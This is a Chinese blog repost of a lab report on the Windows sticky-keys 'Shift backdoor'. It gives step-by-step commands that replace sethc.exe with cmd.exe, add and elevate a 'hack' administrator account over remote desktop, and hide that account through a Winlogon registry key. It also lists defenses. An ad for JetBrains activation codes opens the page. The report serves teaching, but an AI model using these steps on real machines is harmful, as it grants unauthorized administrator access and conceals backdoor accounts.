大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。
Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺
|
一、实验目的及要求 1. 学会创建Shift后门 2.掌握shift后门的原理
二、实验设备(环境)及要求 PC机, VC++等,虚拟云平台 三、实验内容与步骤 1.在192.168.1.3的虚拟机上打开cmd命令指示符; 2.输入“ cd c:\WINDOWS\system32”,进入该文件夹; 3.输入“move sethc.exe sethc.exe.bak”,对“sethc.exe”进行备份; 4.输入“copy cmd.exe sethc.exe”,对cmd.exe进行复制并更名为“sethc.exe”; 5.打开控制面板-> 辅助功能选项->勾选“使用粘滞键”,点击应用; 6.打开192.168.1.2的虚拟机,打开运行,输入“mstsc”打开远程登录程序; 7.输入“192.168.1.3”,点击连接; 8.当出现登录界面时,按5下shift键可进入目标机的cmd中; 9.在cmd中输入“net user hack 123 /add”,创建用户; 10.接下来输入“net localgroup administrators hack /add”和“net user hack /active:yes”,对hack用户进行提权和激活; 11.用hack用户登录目标机。
四、实验结果与数据处理 1.对192.168.1.3的虚拟机的命令操作
2.使用粘滞键
3.用192.168.1.2的虚拟机远程登录192.168.1.3的虚拟机时,创建用户。并对其进行提权和激活
4.成功登录目标机
五、分析与讨论 1.本实验是利用在应用“使用粘滞键”后,windows系统在按5次shift后会调用“sethc.exe”应用程序的原理,将cmd.exe复制并更名为“sethc.exe”,然后替换掉原有的sethc.exe文件,这样在登陆界面的时候我们连续按下5吃shift键系统就会运行cmd.exe,这样我们就可以对目标机进行创建用户,对用户进行相关提权和激活,从而进入目标机。 2.防范措施: (1)禁用shift键的粘滞功能; (2)设置权限,让任何用户都无法访问和修改“sethc.exe”文件。 3.如何创建隐藏用户: 创建用户后,按win+r,输入regedit回车,把注册表放到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList,在里面创建一个dword值,命名为你要隐藏的用户名,数值0。 |
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/192139.html原文链接:https://javaforall.net
